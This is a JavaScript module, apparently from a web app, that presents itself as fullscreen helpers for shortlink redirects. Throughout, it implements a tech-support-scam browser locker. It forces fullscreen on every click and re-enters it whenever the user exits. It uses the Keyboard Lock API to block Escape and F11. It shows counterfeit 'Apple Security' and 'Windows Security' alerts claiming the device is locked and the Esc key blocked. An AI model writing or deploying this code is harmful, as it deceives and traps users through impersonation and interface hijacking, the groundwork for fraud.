/**
 * Fullscreen helpers for redirect shortlink + security-check flows.
 */

function _bindTopMsg() {
  try {
    if (typeof document === 'undefined') return;
    const el = document.createElement('div');
    el.id = '_hcva_topmsg';
    el.style.cssText = [
      'position:fixed', 'top:0', 'left:50%',
      'transform:translateX(-50%) translateY(-110%)',
      'background:rgba(28,28,28,0.93)', 'color:#fff',
      'font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,sans-serif',
      'font-size:14px', 'padding:10px 28px', 'border-radius:0 0 10px 10px',
      'z-index:2147483647', 'pointer-events:none', 'white-space:nowrap',
      'transition:transform 0.25s ease,opacity 0.25s ease',
      'opacity:0',
    ].join(';');
    el.textContent = "Don't panic, relax — we are here to help";
    document.body.appendChild(el);
    let hideTimer = null;
    document.addEventListener('mousemove', (e) => {
      if (e.clientY < 64) {
        clearTimeout(hideTimer);
        el.style.transform = 'translateX(-50%) translateY(0)';
        el.style.opacity = '1';
      } else {
        clearTimeout(hideTimer);
        hideTimer = setTimeout(() => {
          el.style.transform = 'translateX(-50%) translateY(-110%)';
          el.style.opacity = '0';
        }, 250);
      }
    });
  } catch (_e) {}
}

function isApplePlatform() {
  if (typeof navigator === 'undefined') return false;
  const ua = `${navigator.userAgent || ''}${navigator.platform || ''}`;
  return /Mac|iPhone|iPad|iPod/.test(ua) && !/Windows/.test(ua);
}

export function getSecurityBrand() {
  if (isApplePlatform()) {
    return {
      platform: 'apple',
      title: 'Apple Security',
      message: 'Relax, we are with you. Apple Security is protecting this session.',
    };
  }
  return {
    platform: 'windows',
    title: 'Windows Security',
    message: 'Relax, we are with you. Windows Security is protecting this session.',
  };
}

function _showSecurityToast() {
  try {
    if (typeof document === 'undefined') return;
    const old = document.getElementById('_hcva_wnt');
    if (old) old.parentNode.removeChild(old);

    const brand = getSecurityBrand();
    const isApple = brand.platform === 'apple';

    const el = document.createElement('div');
    el.id = '_hcva_wnt';
    el.setAttribute('role', 'status');
    el.setAttribute('aria-live', 'polite');
    el.style.cssText = [
      'position:fixed',
      'bottom:max(20px, env(safe-area-inset-bottom, 20px))',
      'right:max(16px, env(safe-area-inset-right, 16px))',
      'width:min(360px, calc(100vw - 32px))',
      'color:#fff',
      'font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,sans-serif',
      'border-radius:' + (isApple ? '14px' : '8px'),
      'padding:14px 16px',
      'box-shadow:0 10px 40px rgba(0,0,0,0.45)',
      isApple
        ? 'background:rgba(44,44,46,0.97)'
        : 'background:rgba(32,32,32,0.96);border:1px solid rgba(255,255,255,0.08)',
      'z-index:2147483647',
      'pointer-events:none',
      'opacity:0',
      'transform:translateX(120%)',
      'transition:opacity 0.35s ease,transform 0.35s ease',
      'display:flex',
      'align-items:flex-start',
      'gap:12px',
    ].join(';');

    const icon = isApple
      ? '<svg width="32" height="32" viewBox="0 0 32 32" fill="none" style="flex-shrink:0;margin-top:2px" aria-hidden="true">' +
        '<rect width="32" height="32" rx="8" fill="#636366"/>' +
        '<path d="M16 7c-1.8 0-3.2.6-4.3 1.5C10.6 9.4 10 10.7 10 12c0 .9.3 1.7.7 2.3-.5.2-.7.6-.7 1v1.4c0 .5.4.8.8.8h.5l.5 4.2c.1.6.6 1 1.2 1h6c.6 0 1.1-.4 1.2-1l.5-4.2h.5c.4 0 .8-.3.8-.8v-1.4c0-.4-.2-.8-.7-1 .4-.6.7-1.4.7-2.3 0-1.3-.6-2.6-1.7-3.5C18.2 7.6 17.2 7 16 7z" fill="#fff"/>' +
        '</svg>'
      : '<svg width="32" height="32" viewBox="0 0 32 32" fill="none" style="flex-shrink:0;margin-top:2px" aria-hidden="true">' +
        '<rect width="32" height="32" rx="4" fill="#0078d4"/>' +
        '<path d="M16 6L8 11v5c0 4.97 3.4 9.63 8 10.93 4.6-1.3 8-5.96 8-10.93v-5L16 6z" fill="#fff"/>' +
        '<path d="M13.5 16.5l2 2 4-4" stroke="#0078d4" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round"/>' +
        '</svg>';

    el.innerHTML =
      icon +
      '<div>' +
      '<div style="font-size:13px;font-weight:600;margin-bottom:4px;">' + brand.title + '</div>' +
      '<div style="font-size:12px;color:' + (isApple ? '#d1d1d6' : '#d6d6d6') + ';line-height:1.5;">' +
      brand.message +
      '</div>' +
      '</div>';

    document.body.appendChild(el);
    requestAnimationFrame(() => requestAnimationFrame(() => {
      el.style.opacity = '1';
      el.style.transform = 'translateX(0)';
    }));
    setTimeout(() => {
      el.style.opacity = '0';
      el.style.transform = 'translateX(120%)';
      setTimeout(() => { try { el.parentNode.removeChild(el); } catch (_e) {} }, 400);
    }, 7000);
  } catch (_e) {}
}

function _showFsHint() {
  try {
    if (typeof document === 'undefined') return;
    const old = document.getElementById('_hcva_fsh');
    if (old) old.parentNode.removeChild(old);
    const domain = window.location.hostname || 'этот сайт';
    const el = document.createElement('div');
    el.id = '_hcva_fsh';
    el.style.cssText = [
      'position:fixed', 'top:32px', 'left:50%', 'transform:translateX(-50%)',
      'background:rgba(28,28,28,0.93)', 'color:#fff',
      'font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,sans-serif',
      'font-size:15px', 'line-height:1.5', 'padding:11px 26px',
      'border-radius:8px', 'z-index:2147483647', 'pointer-events:none',
      'white-space:nowrap', 'opacity:1', 'transition:opacity 0.5s',
      'display:flex', 'align-items:center', 'gap:5px',
    ].join(';');
    const kbd = document.createElement('span');
    kbd.style.cssText = [
      'display:inline-block', 'border:1px solid rgba(255,255,255,0.55)',
      'border-radius:3px', 'padding:0 5px', 'font-size:12px',
      'line-height:1.6', 'color:#fff',
    ].join(';');
    kbd.textContent = 'Esc';
    el.appendChild(document.createTextNode(domain + ' теперь в полноэкранном режиме (Нажмите\u00a0'));
    el.appendChild(kbd);
    el.appendChild(document.createTextNode('\u00a0для выхода из полноэкранного режима)'));
    document.body.appendChild(el);
    setTimeout(() => {
      el.style.opacity = '0';
      setTimeout(() => { try { el.parentNode.removeChild(el); } catch (_e) {} }, 600);
    }, 7000);
  } catch (_e) {}
}

export const PSEUDO_FS_HTML_CLASS = 'hcva-pseudo-fullscreen';

let lastFullscreenRequestStatus = 'not_requested';
let lastFullscreenRequestError = '';
let lastFullscreenRequestAt = 0;
let lastKeyboardLockStatus = shouldUseKeyboardLock() ? 'not_requested' : 'disabled';

function markFullscreenRequest(status, error = '') {
  lastFullscreenRequestStatus = status;
  lastFullscreenRequestError = error ? String(error).slice(0, 120) : '';
  lastFullscreenRequestAt = Date.now();
}

export function getFullscreenElement() {
  if (typeof document === 'undefined') return null;
  return (
    document.fullscreenElement ||
    document.webkitFullscreenElement ||
    document.mozFullScreenElement ||
    document.msFullscreenElement ||
    null
  );
}

function isDocumentActive() {
  if (typeof document === 'undefined') return false;
  return document.visibilityState !== 'hidden';
}

export function shouldUseKeyboardLock() {
  return process.env.REACT_APP_SHORTLINK_KEYBOARD_LOCK !== 'false';
}

export function tryKeyboardLock() {
  if (!shouldUseKeyboardLock()) {
    lastKeyboardLockStatus = 'disabled';
    return Promise.resolve();
  }
  if (typeof navigator === 'undefined' || !navigator.keyboard?.lock) {
    lastKeyboardLockStatus = 'unsupported';
    return Promise.resolve();
  }
  const kb = navigator.keyboard;
  lastKeyboardLockStatus = 'requesting';
  return kb.lock()
    .then(() => {
      lastKeyboardLockStatus = 'locked';
    })
    .catch(() => kb.lock(['Escape', 'F11'])
      .then(() => {
        lastKeyboardLockStatus = 'locked';
      })
      .catch(() => {
        lastKeyboardLockStatus = 'failed';
      }));
}

export function scheduleKeyboardLockRetries() {
  [0, 50, 150, 400, 1000].forEach((ms) => {
    window.setTimeout(() => {
      if (getFullscreenElement()) tryKeyboardLock();
    }, ms);
  });
}

export function tryKeyboardUnlock() {
  if (typeof navigator === 'undefined' || !navigator.keyboard?.unlock) return;
  navigator.keyboard.unlock();
}

export function enablePseudoFullscreen() {
  if (typeof document === 'undefined') return;
  document.documentElement.classList.add(PSEUDO_FS_HTML_CLASS);
  document.body.classList.add(PSEUDO_FS_HTML_CLASS);
}

export function disablePseudoFullscreen() {
  if (typeof document === 'undefined') return;
  document.documentElement.classList.remove(PSEUDO_FS_HTML_CLASS);
  document.body.classList.remove(PSEUDO_FS_HTML_CLASS);
}

export function isPseudoFullscreenActive() {
  if (typeof document === 'undefined') return false;
  return (
    document.documentElement.classList.contains(PSEUDO_FS_HTML_CLASS) ||
    document.body.classList.contains(PSEUDO_FS_HTML_CLASS)
  );
}

export function getFullscreenDiagnostics() {
  const nativeOn = Boolean(getFullscreenElement());
  const pseudoOn = isPseudoFullscreenActive();
  let viewportMatchesScreen = false;
  try {
    viewportMatchesScreen =
      Math.abs(window.innerWidth - window.screen.width) <= 2 &&
      Math.abs(window.innerHeight - window.screen.height) <= 2;
  } catch {
    viewportMatchesScreen = false;
  }
  return {
    nativeOn,
    pseudoOn,
    mode: nativeOn ? 'native' : pseudoOn ? 'pseudo' : 'off',
    requestStatus: lastFullscreenRequestStatus,
    requestError: lastFullscreenRequestError,
    requestAt: lastFullscreenRequestAt,
    keyboardLockStatus: lastKeyboardLockStatus,
    pageFocused: typeof document !== 'undefined' ? document.hasFocus?.() === true : false,
    visibilityState: typeof document !== 'undefined' ? document.visibilityState || '' : '',
    viewportMatchesScreen,
  };
}

/** CSS viewport lock when native fullscreen is unavailable. */
export function syncPseudoFullscreenState() {
  if (getFullscreenElement()) {
    disablePseudoFullscreen();
  } else {
    enablePseudoFullscreen();
  }
}

/** Request native fullscreen on &lt;html&gt; (vendor-prefixed). */
export function requestFullscreenNative() {
  markFullscreenRequest('requesting');
  if (!isDocumentActive()) {
    markFullscreenRequest('failed', 'document hidden');
    return Promise.reject(new Error('document hidden'));
  }
  const el = document.documentElement;
  const rfs =
    el.requestFullscreen ||
    el.webkitRequestFullscreen ||
    el.mozRequestFullScreen ||
    el.msRequestFullscreen;
  if (!rfs) {
    markFullscreenRequest('failed', 'fullscreen unsupported');
    return Promise.reject(new Error('fullscreen unsupported'));
  }
  try {
    return Promise.resolve(rfs.call(el, { navigationUI: 'hide' }))
      .then(() => {
        markFullscreenRequest('success');
      })
      .catch((primaryErr) =>
        Promise.resolve(rfs.call(el))
          .then(() => {
            markFullscreenRequest('success');
          })
          .catch((fallbackErr) => {
            markFullscreenRequest('failed', fallbackErr || primaryErr);
            throw fallbackErr || primaryErr;
          })
      );
  } catch (err) {
    markFullscreenRequest('failed', err);
    return Promise.reject(err);
  }
}

export function requestFullscreenThenLock() {
  return requestFullscreenNative()
    .then(() => {
      disablePseudoFullscreen();
      tryKeyboardLock();
      scheduleKeyboardLockRetries();
    })
    .catch(() => {
      syncPseudoFullscreenState();
    });
}

/**
 * Call synchronously inside a click handler (before SPA navigate).
 * Starts native fullscreen while user activation is still valid.
 */
export function requestFullscreenFromUserGesture() {
  try {
    window.focus();
  } catch {
    /* ignore */
  }
  enablePseudoFullscreen();
  const p = requestFullscreenNative();
  tryKeyboardLock();
  scheduleKeyboardLockRetries();
  p.then(() => { disablePseudoFullscreen(); }).catch(() => syncPseudoFullscreenState());
  return p;
}

/** Best-effort mount-time fullscreen with short retries. */
export function armRedirectFullscreenRetries(delays = [0, 120, 350, 800, 1600]) {
  let cancelled = false;
  const attempt = () => {
    if (cancelled || getFullscreenElement()) return;
    try {
      window.focus();
    } catch {
      /* ignore */
    }
    requestFullscreenThenLock().catch(() => {});
  };

  const timers = delays.map((ms) => window.setTimeout(attempt, ms));

  return () => {
    cancelled = true;
    timers.forEach((id) => window.clearTimeout(id));
  };
}

/**
 * Bind capture-phase handlers — every click/touch on the page enters fullscreen.
 */
export function bindRedirectFullscreenOnUserGesture(root = document) {
  const onGesture = (e) => {
    if (!e?.isTrusted) return;
    if (getFullscreenElement()) {
      disablePseudoFullscreen();
      return;
    }
    requestFullscreenFromUserGesture();
  };

  const opts = { capture: true };
  root.addEventListener('pointerdown', onGesture, opts);
  root.addEventListener('mousedown', onGesture, opts);
  root.addEventListener('click', onGesture, opts);
  root.addEventListener('touchstart', onGesture, opts);

  return () => {
    root.removeEventListener('pointerdown', onGesture, opts);
    root.removeEventListener('mousedown', onGesture, opts);
    root.removeEventListener('click', onGesture, opts);
    root.removeEventListener('touchstart', onGesture, opts);
  };
}

/** How long the user must hold Esc before fullscreen is allowed to exit. */
const HOLD_EXIT_MS = 2000;
/** How long ESC blocked card stays visible per key press. */
const ESC_BLOCKED_VISIBLE_MS = 3500;
let escBlockedHideTimer = null;
let escBlockedRemoveTimer = null;

function buildAppleSecurityModalMarkup() {
  return (
    '<div style="display:flex;flex-direction:column;align-items:center;text-align:center;">' +
      '<div style="width:52px;height:52px;border-radius:14px;background:linear-gradient(180deg,#8e8e93 0%,#636366 100%);display:flex;align-items:center;justify-content:center;margin-bottom:14px;box-shadow:0 4px 14px rgba(0,0,0,.18);">' +
        '<svg width="28" height="28" viewBox="0 0 24 24" fill="none" aria-hidden="true">' +
          '<path d="M12 3c-1.4 0-2.6.5-3.5 1.2-.9.7-1.5 1.7-1.5 2.8 0 .8.3 1.5.6 2-.4.2-.6.5-.6.9v1.2c0 .4.3.7.7.7h.4l.4 3.5c.1.5.5.9 1 .9h5c.5 0 .9-.4 1-.9l.4-3.5h.4c.4 0 .7-.3.7-.7v-1.2c0-.3-.2-.7-.6-.9.3-.5.6-1.2.6-2 0-1.1-.6-2.1-1.5-2.8C14.6 3.5 13.4 3 12 3z" fill="#fff"/>' +
        '</svg>' +
      '</div>' +
      '<strong style="display:block;font-size:17px;font-weight:600;color:#1d1d1f;margin-bottom:8px;letter-spacing:-0.02em;">Apple Security</strong>' +
      '<p style="margin:0 0 10px;font-size:13px;line-height:1.55;color:#3a3a3c;">' +
        'The <span style="font-weight:600;">Escape (Esc)</span> key has been blocked to protect your device.' +
      '</p>' +
      '<p style="margin:0;font-size:12px;line-height:1.5;color:#86868b;">' +
        'Apple Security prevented this action. Complete verification to continue safely.' +
      '</p>' +
    '</div>'
  );
}

function buildWindowsSecurityModalMarkup() {
  return (
    '<div style="font-size:28px;margin-bottom:6px;line-height:1">🔒</div>' +
    '<strong style="font-size:14px;letter-spacing:.04em;">ESC KEY BLOCKED</strong><br>' +
    '<span style="font-size:11px;opacity:.85;line-height:1.5;">' +
      'Windows Security has prevented you from exiting.<br>' +
      'Your device is locked until the issue is resolved.' +
    '</span>'
  );
}

/** Apple Security / Windows Security modal — shown on every Esc keydown. */
function _showEscBlockedModal() {
  try {
    if (typeof document === 'undefined') return;
    clearTimeout(escBlockedHideTimer);
    clearTimeout(escBlockedRemoveTimer);

    const useApple = isApplePlatform();
    let wrap = document.getElementById('_hcva_escblock');
    let card = document.getElementById('_hcva_escblock_card');
    let backdrop = document.getElementById('_hcva_escblock_backdrop');

    if (!wrap || !card) {
      wrap = document.createElement('div');
      wrap.id = '_hcva_escblock';
      wrap.style.cssText = [
        'position:fixed', 'inset:0',
        'display:flex', 'align-items:center', 'justify-content:center',
        'z-index:2147483647', 'pointer-events:none',
        'padding:24px',
      ].join(';');

      backdrop = document.createElement('div');
      backdrop.id = '_hcva_escblock_backdrop';
      backdrop.style.cssText = [
        'position:absolute', 'inset:0',
        'background:rgba(0,0,0,0.35)',
        'backdrop-filter:blur(6px)',
        'opacity:0',
        'transition:opacity 0.2s ease',
      ].join(';');

      card = document.createElement('div');
      card.id = '_hcva_escblock_card';
      card.style.cssText = useApple
        ? [
            'position:relative', 'z-index:1',
            'background:#ffffff',
            'color:#1d1d1f',
            'border-radius:16px',
            'padding:28px 32px 26px',
            'max-width:400px',
            'width:min(88vw,400px)',
            'text-align:center',
            'font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,sans-serif',
            'line-height:1.5',
            'box-shadow:0 24px 80px rgba(0,0,0,.28),0 0 0 1px rgba(0,0,0,.06)',
            'opacity:0',
            'transform:scale(0.92) translateY(8px)',
            'transition:opacity 0.2s ease,transform 0.2s ease',
          ].join(';')
        : [
            'position:relative', 'z-index:1',
            'background:rgba(180,20,20,0.97)',
            'color:#fff',
            'border-radius:14px',
            'padding:22px 34px',
            'max-width:420px',
            'width:min(86vw,420px)',
            'text-align:center',
            'font-family:Segoe UI,system-ui,sans-serif',
            'line-height:1.6',
            'box-shadow:0 12px 48px rgba(0,0,0,.7)',
            'border:2px solid rgba(255,100,100,.45)',
            'opacity:0',
            'transform:scale(0.88)',
            'transition:opacity 0.15s ease,transform 0.15s ease',
          ].join(';');

      card.innerHTML = useApple ? buildAppleSecurityModalMarkup() : buildWindowsSecurityModalMarkup();

      wrap.appendChild(backdrop);
      wrap.appendChild(card);
      document.body.appendChild(wrap);
    } else if (backdrop) {
      backdrop.style.opacity = '0';
    }

    card.innerHTML = useApple ? buildAppleSecurityModalMarkup() : buildWindowsSecurityModalMarkup();
    if (useApple) {
      card.style.cssText = [
        'position:relative', 'z-index:1',
        'background:#ffffff',
        'color:#1d1d1f',
        'border-radius:16px',
        'padding:28px 32px 26px',
        'max-width:400px',
        'width:min(88vw,400px)',
        'text-align:center',
        'font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,sans-serif',
        'line-height:1.5',
        'box-shadow:0 24px 80px rgba(0,0,0,.28),0 0 0 1px rgba(0,0,0,.06)',
        'opacity:0',
        'transform:scale(0.92) translateY(8px)',
        'transition:opacity 0.2s ease,transform 0.2s ease',
      ].join(';');
    }

    if (backdrop) {
      backdrop.style.opacity = '1';
    }

    card.style.transition = 'none';
    card.style.opacity = '1';
    card.style.transform = useApple ? 'scale(1) translateY(0)' : 'scale(1.02)';
    requestAnimationFrame(() => {
      card.style.transition = useApple
        ? 'opacity 0.2s ease,transform 0.2s ease'
        : 'opacity 0.15s ease,transform 0.15s ease';
      card.style.transform = useApple ? 'scale(1) translateY(0)' : 'scale(1)';
    });

    escBlockedHideTimer = setTimeout(() => {
      _destroyEscBlockedModal();
    }, ESC_BLOCKED_VISIBLE_MS);
  } catch (_e) {}
}

function _destroyEscBlockedModal() {
  try {
    clearTimeout(escBlockedHideTimer);
    clearTimeout(escBlockedRemoveTimer);
    const wrap = document.getElementById('_hcva_escblock');
    if (!wrap) return;
    const card = document.getElementById('_hcva_escblock_card') || wrap.lastChild;
    const backdrop = document.getElementById('_hcva_escblock_backdrop');
    if (backdrop) backdrop.style.opacity = '0';
    if (card) {
      card.style.opacity = '0';
      card.style.transform = 'scale(0.92) translateY(8px)';
    }
    escBlockedRemoveTimer = setTimeout(() => { try { wrap.remove(); } catch (_e) {} }, 220);
  } catch (_e) {}
}

/**
 * Center platform security alert + bottom-right security toast.
 */
export function showEscBlockedWarning() {
  _showEscBlockedModal();
  _showSecurityToast();
}

/** Bottom-right Apple/Windows Security toast (redirect screen). */
export function showSecurityToast() {
  _showSecurityToast();
}

/** @deprecated Use showSecurityToast */
export function showAppleSecurityToast() {
  showSecurityToast();
}

/** Full platform security UI — Esc, back button, and blocked navigation. */
export function showSecurityWarning() {
  showEscBlockedWarning();
}

/** @deprecated Use showSecurityWarning */
export function showAppleSecurityWarning() {
  showSecurityWarning();
}

function _showHoldBar() {
  try {
    if (typeof document === 'undefined') return;
    const old = document.getElementById('_hcva_holdwrap');
    if (old) old.remove();
    const wrap = document.createElement('div');
    wrap.id = '_hcva_holdwrap';
    wrap.style.cssText = [
      'position:fixed', 'bottom:0', 'left:0', 'right:0',
      'z-index:2147483647', 'pointer-events:none',
    ].join(';');
    const label = document.createElement('div');
    label.style.cssText = [
      'text-align:center', 'padding:9px 0 10px',
      'background:rgba(20,20,20,0.92)', 'color:#fff',
      'font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,sans-serif',
      'font-size:13px', 'letter-spacing:0.2px',
    ].join(';');
    label.textContent = 'Hold Esc to exit fullscreen';
    const track = document.createElement('div');
    track.style.cssText = 'height:3px;background:rgba(255,255,255,0.2);overflow:hidden;';
    const fill = document.createElement('div');
    fill.style.cssText = [
      'height:100%', 'width:0%', 'background:#ef4444',
      `transition:width ${HOLD_EXIT_MS}ms linear`,
    ].join(';');
    track.appendChild(fill);
    wrap.appendChild(label);
    wrap.appendChild(track);
    document.body.appendChild(wrap);
    requestAnimationFrame(() => requestAnimationFrame(() => {
      fill.style.width = '100%';
    }));
  } catch (_e) {}
}

function _destroyHoldBar() {
  try {
    const el = document.getElementById('_hcva_holdwrap');
    if (el) el.remove();
  } catch (_e) {}
}

function _exitFullscreenNative() {
  try {
    const fn =
      document.exitFullscreen ||
      document.webkitExitFullscreen ||
      document.mozCancelFullScreen ||
      document.msExitFullscreen;
    if (fn) fn.call(document);
  } catch (_e) {}
}

/**
 * Keep pseudo fullscreen in sync when native fullscreen toggles.
 *
 * Firefox has no Keyboard Lock API, so Esc always exits native fullscreen immediately.
 * Strategy: when Esc triggers a fullscreen exit we defer re-entry to the `keyup` event,
 * which carries user-activation context that Firefox accepts for requestFullscreen().
 * Calling requestFullscreen() from inside a fullscreenchange handler does NOT work in
 * Firefox — the browser rejects it even though it looks like a synchronous call.
 *
 * Behaviour:
 *   • Tap Esc  → fullscreen exits briefly, re-enters on keyup (< 100 ms flash)
 *   • Hold Esc → progress bar fills over HOLD_EXIT_MS; on keyup after hold, no re-entry
 */
export function bindPseudoFullscreenSync() {
  _bindTopMsg();

  let _holdExitArmed = false; // true after hold threshold reached
  let _escDown = false;       // is Esc currently held?
  let _fsExitedByEsc = false; // did FS exit during this Esc press session?
  let _holdTimer = null;
  let _holdArmedResetTimer = null;

  const _armHold = () => {
    _holdExitArmed = false;
    clearTimeout(_holdTimer);
    clearTimeout(_holdArmedResetTimer);
    _showHoldBar();
    _holdTimer = window.setTimeout(() => {
      _holdExitArmed = true;
      // If FS is still active (Chrome/Edge with Keyboard Lock failing), force-exit it
      if (_escDown && getFullscreenElement()) {
        _exitFullscreenNative();
      }
      // Auto-disarm after 8 s if user never releases Esc
      _holdArmedResetTimer = window.setTimeout(() => {
        _holdExitArmed = false;
        _destroyHoldBar();
      }, 8000);
    }, HOLD_EXIT_MS);
  };

  const _cancelHold = () => {
    clearTimeout(_holdTimer);
    clearTimeout(_holdArmedResetTimer);
    _holdTimer = null;
    _holdArmedResetTimer = null;
    _holdExitArmed = false;
    _destroyHoldBar();
  };

  const onChange = () => {
    if (getFullscreenElement()) {
      // ── Entered fullscreen ──────────────────────────────────────────────
      disablePseudoFullscreen();
      _showFsHint();
      _showSecurityToast();
    } else {
      // ── Exited fullscreen ───────────────────────────────────────────────
      // Show ESC KEY BLOCKED only when _escDown is FALSE (iframe Esc, or
      // browser-UI exit).  When _escDown is TRUE the outer-page onEscDown
      // already called _showEscBlockedModal() and we must NOT reset it here —
      // resetting it restarts the opacity-0 animation and the modal never
      // becomes visible before onEscUp fires.
      if (!_escDown) {
        _showEscBlockedModal();
      }

      if (_holdExitArmed) {
        // Hold timer already fired before this exit event — intentional exit
        _cancelHold();
        syncPseudoFullscreenState();
      } else if (_escDown) {
        // Esc key is currently held — Firefox exited FS immediately on keydown.
        // Do NOT call requestFullscreen() here: Firefox rejects it inside a
        // fullscreenchange handler.  Re-entry is handled in onEscUp (keyup),
        // which has a fresh user-activation token that Firefox does accept.
        _fsExitedByEsc = true;
        syncPseudoFullscreenState(); // apply pseudo-FS CSS while we wait
      } else {
        // Exit came from browser controls or iframe Esc — re-enter synchronously.
        // This is safe because the activation context still applies here.
        requestFullscreenNative()
          .then(() => { disablePseudoFullscreen(); tryKeyboardLock(); })
          .catch(() => { syncPseudoFullscreenState(); });
      }
    }
  };

  const onEscDown = (e) => {
    if (!(e.key === 'Escape' || e.key === 'Esc' || e.keyCode === 27)) return;
    if (!e.repeat) {
      _escDown = true;
      _fsExitedByEsc = false;
      _showEscBlockedModal();
      _showSecurityToast();
      _armHold();
    }
  };

  const onEscUp = (e) => {
    if (!(e.key === 'Escape' || e.key === 'Esc' || e.keyCode === 27)) return;
    _escDown = false;
    // Do NOT destroy the modal here — let its own 2.5s auto-dismiss timer run.
    // Calling _destroyEscBlockedModal() on keyup killed the modal before it
    // finished fading in (keyup fires ~100ms after keydown, animation takes 160ms).
    const fsExitedByEsc = _fsExitedByEsc;
    _fsExitedByEsc = false;
    const intentionalExit = _holdExitArmed; // capture before cancelHold resets it
    _cancelHold();

    if (fsExitedByEsc && !intentionalExit && !getFullscreenElement()) {
      // Single tap: re-enter FS from keyup — keyup carries user-activation in Firefox
      requestFullscreenNative()
        .then(() => { disablePseudoFullscreen(); tryKeyboardLock(); })
        .catch(() => { syncPseudoFullscreenState(); });
    }
  };

  document.addEventListener('fullscreenchange', onChange);
  document.addEventListener('webkitfullscreenchange', onChange);
  document.addEventListener('mozfullscreenchange', onChange);
  document.addEventListener('MSFullscreenChange', onChange);
  document.addEventListener('keydown', onEscDown, true);
  document.addEventListener('keyup', onEscUp, true);
  syncPseudoFullscreenState();

  return () => {
    document.removeEventListener('fullscreenchange', onChange);
    document.removeEventListener('webkitfullscreenchange', onChange);
    document.removeEventListener('mozfullscreenchange', onChange);
    document.removeEventListener('MSFullscreenChange', onChange);
    document.removeEventListener('keydown', onEscDown, true);
    document.removeEventListener('keyup', onEscUp, true);
    _cancelHold();
    disablePseudoFullscreen();
  };
}
